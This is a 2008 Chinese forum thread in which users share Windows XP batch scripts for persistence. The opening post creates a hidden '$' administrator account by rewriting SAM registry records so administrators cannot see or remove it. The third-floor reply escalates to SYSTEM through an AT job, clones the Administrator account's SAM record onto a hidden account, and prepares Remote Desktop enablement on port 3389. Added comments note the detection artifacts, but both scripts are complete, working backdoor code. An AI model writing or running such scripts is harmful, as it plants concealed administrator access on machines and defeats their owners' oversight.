wangzenggogo
『楼 主』:
建立隐藏账户的问题!
高手帮小弟找找问题！下面的代码已经实现了在 XP 中建立隐藏账户，并且管理员没办法删除你的账户，也不知道你的账户是什么。但是问题出来了：功能实现了，可是我的电脑-属性-用户无法显示，也不能建立用户，cmd 下 net user 命令报错！帮帮忙吧！
:: Creates a local account whose name ends in "$" (omitted from `net user`
:: output and the XP account lists), adds it to Administrators, then
:: overwrites its SAM entry with hard-coded "F"/"V" blobs so the registry
:: object persists after the visible user object is deleted.
:: Needs an elevated context, writes 1.txt and two .reg files into the
:: current directory, and edits keys under HKLM\SAM that only SYSTEM
:: normally writes. Each step is a host-level artifact (account creation,
:: SAM ACL change, regedit import of SAM keys) that is worth alerting on.
@echo off
:: Plain account creation; the Security log records this and the group change.
net user wangzenggogo$ wangzenggogo /add
net localgroup administrators wangzenggogo$ /add
:: Build a regini script: each line is a key path followed by an ACE index.
:: regini's "[1]" is its shorthand for Administrators Full Access, applied
:: down the SAM\Domains\Account\Users tree (000001F4 = RID 500, built-in
:: Administrator; 000001F5 = RID 501, Guest) so the keys can be edited below.
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1] >>1.txt
regini.exe 1.txt
del 1.txt
:: Names\<account> maps a name to a RID through the default value's *type*
:: field: hex(3eb) = 0x3EB = RID 1003, which is the key written next.
echo Windows Registry Editor Version 5.00 > wangzenggogo$.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wangzenggogo$] >> wangzenggogo$.reg
echo @=hex(3eb): >> wangzenggogo$.reg
:: Account record for RID 0x3EB as literal bytes (not exported from this
:: host). "F" is the fixed-length part, "V" the variable part; the "V" bytes
:: include the UTF-16 account name (77,00,61,00,6e,00,67,00,... = "wang...$").
echo Windows Registry Editor Version 5.00 > 3EB.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EB] >> 3EB.reg
echo "F"=hex:02,00,01,00,00,00,00,00,fc,52,7c,ac,8d,c1,c8,01,00,00,00,00,00,00,00,\ >> 3EB.reg
echo 00,86,2c,c2,ad,1c,33,c8,01,ff,ff,ff,ff,ff,ff,ff,7f,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,0b,00,01,00,00,00,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00 >> 3EB.reg
echo "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1a,00,00,00,00,00,00,\ >> 3EB.reg
echo 00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,\ >> 3EB.reg
echo 08,00,00,00,01,00,00,00,e0,00,00,00,14,00,00,00,00,00,00,00,f4,00,00,00,14,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,08,01,00,00,04,00,00,00,00,00,00,00,0c,01,00,00,04,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\ >> 3EB.reg
echo 00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\ >> 3EB.reg
echo 00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\ >> 3EB.reg
echo 00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\ >> 3EB.reg
echo 00,00,eb,25,79,2c,4b,2c,bc,1a,43,17,0a,32,eb,03,00,00,00,00,18,00,ff,07,0f,\ >> 3EB.reg
echo 00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\ >> 3EB.reg
echo 01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\ >> 3EB.reg
echo 02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,77,00,61,00,6e,00,\ >> 3EB.reg
echo 67,00,7a,00,65,00,6e,00,67,00,67,00,6f,00,67,00,6f,00,24,00,00,00,01,02,00,\ >> 3EB.reg
echo 00,07,00,00,00,01,00,01,00,f3,0d,8e,33,95,cd,e9,8f,12,b7,9a,ed,98,60,17,2f,\ >> 3EB.reg
echo 01,00,01,00,36,9f,5d,12,1b,86,55,67,f1,f7,49,c8,b0,21,ef,45,01,00,01,00,01,\ >> 3EB.reg
echo 00,01,00 >> 3EB.reg
:: Remove the visible account, then import the two .reg files so the Names
:: entry and the RID 0x3EB record exist without a normally created user object.
net user wangzenggogo$ /del
regedit /s wangzenggogo$.reg
del wangzenggogo$.reg
regedit /s 3EB.reg
del 3EB.reg
:: Second regini pass with "[2]" (Administrators Read Access) -- presumably
:: meant to tighten the ACL again; whether this matches the original SAM
:: ACEs is not something the script checks or restores from a backup.
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [2] >>1.txt
regini.exe 1.txt
del 1.txt
:: Set a password on the re-created account.
net user wangzenggogo$ 123456
2008-5-30 20:53
crazysakura
2008-12-5 21:52
a794685135
『第 3 楼』:
:: Clone-account script. It first arranges to continue from a SYSTEM-context
:: explorer.exe (scheduled with AT), creates an account "<user>$" hidden from
:: `net user`, replaces the "F" part of its SAM record with the one exported
:: from %buser% (Administrator), deletes the visible user object, and finally
:: writes a .reg file that would enable Remote Desktop on port 3389.
:: Artifacts left behind: an AT job, explorer.exe killed, SAM exports and
:: several .reg files under %SystemRoot%, a Security-log account create/delete
:: pair, and the Terminal Server registry edits.
@echo off
:: First, obtain a SYSTEM shell. On XP, AT jobs run as SYSTEM, so an
:: interactive explorer.exe scheduled this way yields a SYSTEM desktop.
:: a1 = "HH:M" (first four chars of %time%), b1 = last digit of the minute.
:3
set a1=%time:~0,4%
set b1=%time:~4,1%
:: Leave the polling loop once the seconds field reads 55.
if %time:~6,2% EQU 55 goto 2
:: Sleep ~10 s at a time so the busy loop does not hold the CPU at 100%.
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
:: Kill the logged-on user's explorer so the SYSTEM-owned one started below
:: takes over the desktop.
taskkill /f /im explorer.exe
:: c = first digit greater than b1; a1 followed by c is the next minute,
:: used as the AT run time.
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
:: Schedule explorer.exe interactively for HH:Mc, then wait ~30 s for it.
at %a1%%c% /interactive %systemroot%\explorer.exe
ping -n 30 127.1 >nul
:: Step 1: create the clone account.
:: Name of the clone account (a "$" is appended when it is created).
set user=1234567
:: Account whose SAM record is copied.
set buser=Administrator
:: Base path of the SAM user keys.
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
:: Create the hidden account %user%$ with password %user%88.
net user %user%$ %user%88 /add
:: Step 2: export the clone account's registry keys.
:: Export the Names\%user%$ key; its default value's type field holds the RID.
reg export %ridkey%Names\%user%$ %SystemRoot%\%user%$.reg
:: Extract the RID: the text between the parentheses of the "@=hex(...)" line.
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%user%$.reg') do set userrid=%%i
:: Export the clone's account record, Users\00000<rid>.
reg export %ridkey%00000%userrid% %SystemRoot%\%userrid%.reg
:: Step 3: export the source account's registry keys (same three steps).
:: Export the Names\%buser% key.
reg export %ridkey%Names\%buser% %SystemRoot%\%buser%$.reg
:: Extract %buser%'s RID.
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%buser%$.reg') do set buserrid=%%i
:: Export %buser%'s account record.
reg export %ridkey%00000%buserrid% %SystemRoot%\%buserrid%.reg
:: Step 4: splice the two exports.
:: Keep the "V"=hex: part of the clone's record: lines containing "," after
:: skipping the first 6 (presumably find's banner plus the four "F" lines).
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
:: Build the header of the merged .reg file for the clone's RID key.
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
:: Take the "F"=hex: part of the source account and append it to the header.
:: Each round copies the first remaining line (set /p reads one line), then
:: rebuilds the temp file without it via find /v; four rounds cover the four
:: lines of an exported "F" value. "%a:~4%" matches on the line minus its
:: first four characters (the "F"= prefix / indent), presumably so the
:: comparison is on the hex payload only.
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
:: Append the clone's "V" part to the header + copied "F" part.
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
:: (Labelled step 4 again in the original.) Delete the visible clone account.
net user %user%$ /del
:: Step 5: import the spliced record and the Names entry for the clone.
regedit /s %SystemRoot%\%user%-first.reg
regedit /s %SystemRoot%\%user%$.reg
:: Remove the working files from %SystemRoot%.
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
:: Build a .reg file that enables Remote Desktop: fDenyTSConnections=0 allows
:: connections and PortNumber=0xd3d (3389) is set on both listener keys.
:: Within this listing the file is only written, not imported.
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
几个月前写的，有些地方不好。
[ Last edited by a794685135 on 2008-12-5 at 22:03 ]
2008-12-5 22:02
HAT
『第 4 楼』:
Re 3楼
你觉得哪些地方不好?
2008-12-5 22:37